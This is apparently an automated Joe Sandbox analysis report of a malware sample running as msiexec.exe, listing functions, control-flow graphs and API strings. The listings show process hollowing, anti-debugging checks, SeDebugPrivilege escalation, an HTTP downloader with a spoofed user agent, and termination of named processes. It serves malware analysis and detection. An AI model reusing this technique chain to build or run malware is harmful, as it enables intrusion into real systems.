Function_00007FF63B521CDC 84 Function_00007FF63B5230DC 84->10 84->16 84->58 84->59 104 Function_00007FF63B5245C4 84->104 85->40 98 Function_00007FF63B522CB8 87->98 89->32 89->85 89->87 89->102 89->103 90 Function_00007FF63B5231EC 90->35 91 Function_00007FF63B5236EC 92 Function_00007FF63B52BCF1 93 Function_00007FF63B52B2F4 94 Function_00007FF63B52C2F5 95 Function_00007FF63B52ABF2 96 Function_00007FF63B52E8F3 97 Function_00007FF63B52D8B8 98->18 99 Function_00007FF63B52DEC1 100 Function_00007FF63B52D0C4 101 Function_00007FF63B52DCC2 102->44 103->69 104->45 106 Function_00007FF63B52EFCA 107 Function_00007FF63B5233CC 107->47 108 Function_00007FF63B52C9CB 109 Function_00007FF63B52A2D0

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 231 7ff63b52345c-7ff63b523472 call 7ff63b5210a0 call 7ff63b52321c 236 7ff63b52347c-7ff63b5234aa call 7ff63b524264 call 7ff63b523ce4 call 7ff63b523f14 231->236 237 7ff63b523474-7ff63b523476 ExitProcess 231->237 244 7ff63b5234fb-7ff63b52350e call 7ff63b523f14 236->244 245 7ff63b5234ac-7ff63b5234bd call 7ff63b5243a4 236->245 252 7ff63b52354c-7ff63b52355f call 7ff63b523f14 244->252 253 7ff63b523510-7ff63b523521 call 7ff63b5243a4 244->253 250 7ff63b5234bf-7ff63b5234d0 call 7ff63b5243a4 245->250 251 7ff63b5234d2-7ff63b5234d4 ExitProcess 245->251 250->251 262 7ff63b5234da call 7ff63b5232ec 250->262 263 7ff63b523561-7ff63b523572 call 7ff63b5243a4 252->263 264 7ff63b5235a2-7ff63b5235b8 call 7ff63b523a74 call 7ff63b5233ec 252->264 260 7ff63b52352b call 7ff63b52327c 253->260 261 7ff63b523523-7ff63b523525 ExitProcess 253->261 269 7ff63b523530-7ff63b523535 260->269 271 7ff63b5234df-7ff63b5234e4 262->271 278 7ff63b52357c call 7ff63b52327c 263->278 279 7ff63b523574-7ff63b523576 ExitProcess 263->279 282 7ff63b5235ba-7ff63b5235cb call 7ff63b5243a4 264->282 283 7ff63b52360e-7ff63b5236d0 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 264->283 273 7ff63b523537-7ff63b523542 Sleep 269->273 274 7ff63b523544-7ff63b523546 ExitProcess 269->274 276 7ff63b5234e6-7ff63b5234f1 Sleep 271->276 277 7ff63b5234f3-7ff63b5234f5 ExitProcess 271->277 273->269 276->271 284 7ff63b523581-7ff63b523586 278->284 289 7ff63b5235cd-7ff63b5235de call 7ff63b5243a4 282->289 290 7ff63b5235e0-7ff63b5235e2 ExitProcess 282->290 285 7ff63b523588-7ff63b523593 Sleep 284->285 286 7ff63b523595-7ff63b523597 ExitProcess 284->286 285->284 289->290 293 7ff63b5235e8 call 7ff63b5232ec 289->293 295 7ff63b5235ed-7ff63b5235f2 293->295 296 7ff63b523601-7ff63b523603 ExitProcess 295->296 297 7ff63b5235f4-7ff63b5235ff Sleep 295->297 297->295
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000009.00000002.1439084024.00007FF63B521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF63B520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439040744.00007FF63B520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439168323.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439194981.00007FF63B527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439229739.00007FF63B528000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439266238.00007FF63B52A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff63b520000_msiexec.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                  • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                  • API String ID: 613740775-1953711635
                                                                                                                                                                                                  • Opcode ID: 8ceee07a51bd93bcdc0c94c1efd1dcbb9b80b1b3d7bb6e6e8f4b7753da0e9892
                                                                                                                                                                                                  • Instruction ID: d9a338d470b3b79b56c55da11c5d0b2b2f1e21887e893089cc1678cea6c130b2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ceee07a51bd93bcdc0c94c1efd1dcbb9b80b1b3d7bb6e6e8f4b7753da0e9892
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21611B21A1A65385FA64AF31E85527A2260BFAC721F500135D5CECE3F3CF3DEA09A610

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000009.00000002.1439084024.00007FF63B521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF63B520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439040744.00007FF63B520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439168323.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439194981.00007FF63B527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439229739.00007FF63B528000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439266238.00007FF63B52A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff63b520000_msiexec.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 434396405-0
                                                                                                                                                                                                  • Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                  • Instruction ID: 55eeef61500632e755c8a4b2bbf26fba8fa97b75d4f6c3e2fb03b27ef5c4985e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7131E336619A8186D750CF15E45062AB7A0FBD87A0F105135FACE8BB69DF7CD4459B00

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000009.00000002.1439084024.00007FF63B521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF63B520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439040744.00007FF63B520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439168323.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439194981.00007FF63B527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439229739.00007FF63B528000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439266238.00007FF63B52A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff63b520000_msiexec.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3920101602-0
                                                                                                                                                                                                  • Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                  • Instruction ID: ecee9305b3ddf7ff070b6f7ab07e27896c44189ca4a09eaaa10eeba9074682e8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CF0FE21A0E28289E7344F65A40437967A0AF69B18F041174D9CD8E7A6CF6CE609EF11

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000009.00000002.1439084024.00007FF63B521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF63B520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439040744.00007FF63B520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439168323.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439194981.00007FF63B527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439229739.00007FF63B528000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439266238.00007FF63B52A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff63b520000_msiexec.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4294037311-0
                                                                                                                                                                                                  • Opcode ID: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                                                  • Instruction ID: c3d60b46bf4fac246fe20235ceaa6a9f68e9f00087443d35faae343f008f5baf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1F03025A0E641C2EA209F20A44537D23B0FFA9711F504435DACEC6776CF3DD449A600

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 328 7ff63b521050-7ff63b52108c LoadLibraryA GetProcAddress
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000009.00000002.1439084024.00007FF63B521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF63B520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439040744.00007FF63B520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439168323.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439194981.00007FF63B527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439229739.00007FF63B528000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439266238.00007FF63B52A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff63b520000_msiexec.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                                                                                  • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                  • Instruction ID: 69a5e7126354918d9acfbf952a1b1c43306217df9a4d70e106c4536b5058d127
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48E07E76509E8086C620DB15F84001AB7B4FB88794F504125EACD82B38DF3CC5698B04

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 329 7ff63b523b24-7ff63b523b33 330 7ff63b523b48-7ff63b523b4c 329->330 331 7ff63b523b35-7ff63b523b42 VirtualFree 329->331 331->330
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000009.00000002.1439084024.00007FF63B521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF63B520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439040744.00007FF63B520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439168323.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439194981.00007FF63B527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439229739.00007FF63B528000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439266238.00007FF63B52A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff63b520000_msiexec.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                  • Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                  • Instruction ID: 7fa51e4027f77e748a11d163ace08662fbb73c56cab653babbf57db71c111840
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23D01221E3998181EB94DF26E889729A3A0FFC8B44F808035E7C985675CF3CC5998F00

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 332 7ff63b522048-7ff63b5220c2 GetModuleFileNameW 333 7ff63b5220c9-7ff63b522105 332->333 334 7ff63b5220c4 332->334 336 7ff63b522107-7ff63b52210f 333->336 337 7ff63b52211d-7ff63b522139 call 7ff63b521f88 333->337 335 7ff63b52296d-7ff63b522975 334->335 338 7ff63b52213b-7ff63b522157 call 7ff63b521fc8 336->338 339 7ff63b522111-7ff63b522119 336->339 348 7ff63b52217c-7ff63b522186 337->348 338->348 342 7ff63b522159-7ff63b522175 call 7ff63b522008 339->342 343 7ff63b52211b-7ff63b522177 339->343 342->348 343->335 350 7ff63b522188 348->350 351 7ff63b52218d-7ff63b5221e1 CreateProcessW 348->351 350->335 352 7ff63b5221e8-7ff63b522228 351->352 353 7ff63b5221e3 351->353 355 7ff63b52222a 352->355 356 7ff63b52222f-7ff63b52224b GetFileSize 352->356 353->335 355->335 357 7ff63b522257-7ff63b522262 CloseHandle 356->357 358 7ff63b52224d-7ff63b522255 356->358 357->335 358->357 359 7ff63b522267-7ff63b52228f VirtualAlloc 358->359 360 7ff63b5222a1-7ff63b5222cc ReadFile 359->360 361 7ff63b522291-7ff63b52229c CloseHandle 359->361 362 7ff63b5222ce-7ff63b5222ec VirtualFree CloseHandle 360->362 363 7ff63b5222f1-7ff63b52233f CloseHandle GetThreadContext 360->363 361->335 362->335 364 7ff63b522359-7ff63b5223de ReadProcessMemory GetModuleHandleA GetProcAddress 363->364 365 7ff63b522341-7ff63b522354 VirtualFree 363->365 367 7ff63b5223f8-7ff63b522461 VirtualAllocEx 364->367 368 7ff63b5223e0-7ff63b5223f3 VirtualFree 364->368 365->335 369 7ff63b52247b-7ff63b5224af WriteProcessMemory 367->369 370 7ff63b522463-7ff63b522476 VirtualFree 367->370 368->335 371 7ff63b5224c9-7ff63b5224d4 369->371 372 7ff63b5224b1-7ff63b5224c4 VirtualFree 369->372 370->335 373 7ff63b5224e6-7ff63b5224f9 371->373 372->335 374 7ff63b5225a7-7ff63b5225ee 373->374 375 7ff63b5224ff-7ff63b522588 WriteProcessMemory 373->375 378 7ff63b522600-7ff63b522613 374->378 376 7ff63b52258a-7ff63b52259d VirtualFree 375->376 377 7ff63b5225a2 375->377 376->335 377->373 380 7ff63b522619-7ff63b522668 RtlCompareMemory 378->380 381 7ff63b522898-7ff63b52291c WriteProcessMemory SetThreadContext 378->381 382 7ff63b52266a 380->382 383 7ff63b52266c-7ff63b522695 380->383 384 7ff63b52291e-7ff63b522931 VirtualFree 381->384 385 7ff63b522933-7ff63b522943 ResumeThread 381->385 382->378 387 7ff63b5226a0-7ff63b5226ae 383->387 384->335 388 7ff63b52295a-7ff63b522967 VirtualFree 385->388 389 7ff63b522945-7ff63b522958 VirtualFree 385->389 390 7ff63b522893 387->390 391 7ff63b5226b4-7ff63b52273f 387->391 388->335 389->335 390->381 392 7ff63b522751-7ff63b52275f 391->392 393 7ff63b52288e 392->393 394 7ff63b522765-7ff63b522798 392->394 393->387 395 7ff63b52279a 394->395 396 7ff63b52279c-7ff63b52286f ReadProcessMemory WriteProcessMemory 394->396 395->392 398 7ff63b522889 396->398 399 7ff63b522871-7ff63b522884 VirtualFree 396->399 398->393 399->335
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000009.00000002.1439084024.00007FF63B521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF63B520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439040744.00007FF63B520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439168323.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439194981.00007FF63B527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439229739.00007FF63B528000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439266238.00007FF63B52A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff63b520000_msiexec.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                                  • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                  • API String ID: 514040917-3001742581
                                                                                                                                                                                                  • Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                  • Instruction ID: 1d6ec327e5efb7cd43fcd0ea7b12fca3bec34396c5b15467c9666c55bf40dba6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D32E536A0DAC586E774CF16E8547AAB3A1FB88B94F004136DACD87B69DF3DD4449B00

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000009.00000002.1439084024.00007FF63B521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF63B520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439040744.00007FF63B520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439168323.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439194981.00007FF63B527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439229739.00007FF63B528000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439266238.00007FF63B52A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff63b520000_msiexec.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                                                                  • API String ID: 2379135442-2896544425
                                                                                                                                                                                                  • Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                  • Instruction ID: 7f983ddc1e72085a2858ad6dc95fcbbab74fc432e94eda89e994ff8820df3c48
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF413A32619A8186E750CF51F44876AB7B0FBC8765F504135EBC98ABA9CF7DD448CB00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000009.00000002.1439084024.00007FF63B521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF63B520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439040744.00007FF63B520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439168323.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439194981.00007FF63B527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439229739.00007FF63B528000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439266238.00007FF63B52A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff63b520000_msiexec.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                  • API String ID: 4073123320-2766056989
                                                                                                                                                                                                  • Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                  • Instruction ID: 2262dbba0a0f97c55ad3af8e884d0a96f6ac743c08ee7770d0fa702d1b97c588
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9241E236A0DA8986E770CF15E44436AB7A0F788B94F104025EACD8BB69DF7ED4489B40

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF63B521D19
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000009.00000002.1439084024.00007FF63B521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF63B520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439040744.00007FF63B520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439168323.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439194981.00007FF63B527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439229739.00007FF63B528000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439266238.00007FF63B52A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff63b520000_msiexec.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                  • API String ID: 2307068205-2771526726
                                                                                                                                                                                                  • Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                  • Instruction ID: 44da510089d8d53b902a49e32edf355d6d9b0a6764f9813cd8c0cdcb7d3f5345
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E571C536619A8182E750CF55F49472AB7B0FBC87A5F501035FACA8BB69CF7CD8449B40

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000009.00000002.1439084024.00007FF63B521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF63B520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439040744.00007FF63B520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439168323.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439194981.00007FF63B527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439229739.00007FF63B528000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439266238.00007FF63B52A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff63b520000_msiexec.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Heap$AllocateCloseFileHandleProcessSize
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1391523307-0
                                                                                                                                                                                                  • Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                  • Instruction ID: c880cc134ea790be2e15de56c9d7a75a3399a6e7c5ae3c49dd99f17ae9eca618
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F81D532609B8186EB60CF55F48536AA7A0FBC9BA1F104135EADE87B79DF7CD4449B00

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF63B5245C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63B523117), ref: 00007FF63B524654
                                                                                                                                                                                                    • Part of subcall function 00007FF63B523C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF63B523C3C
                                                                                                                                                                                                    • Part of subcall function 00007FF63B523E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF63B523E37
                                                                                                                                                                                                    • Part of subcall function 00007FF63B523E24: Process32FirstW.KERNEL32 ref: 00007FF63B523E6A
                                                                                                                                                                                                    • Part of subcall function 00007FF63B523E24: CloseHandle.KERNEL32 ref: 00007FF63B523E7C
                                                                                                                                                                                                    • Part of subcall function 00007FF63B523E24: wcscmp.MSVCRT ref: 00007FF63B523E91
                                                                                                                                                                                                    • Part of subcall function 00007FF63B523E24: OpenProcess.KERNEL32 ref: 00007FF63B523EA7
                                                                                                                                                                                                    • Part of subcall function 00007FF63B523E24: TerminateProcess.KERNEL32 ref: 00007FF63B523ECA
                                                                                                                                                                                                    • Part of subcall function 00007FF63B523E24: CloseHandle.KERNEL32 ref: 00007FF63B523ED8
                                                                                                                                                                                                    • Part of subcall function 00007FF63B523E24: Process32NextW.KERNEL32 ref: 00007FF63B523EEB
                                                                                                                                                                                                    • Part of subcall function 00007FF63B523E24: CloseHandle.KERNEL32 ref: 00007FF63B523EFD
                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 00007FF63B5231C6
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
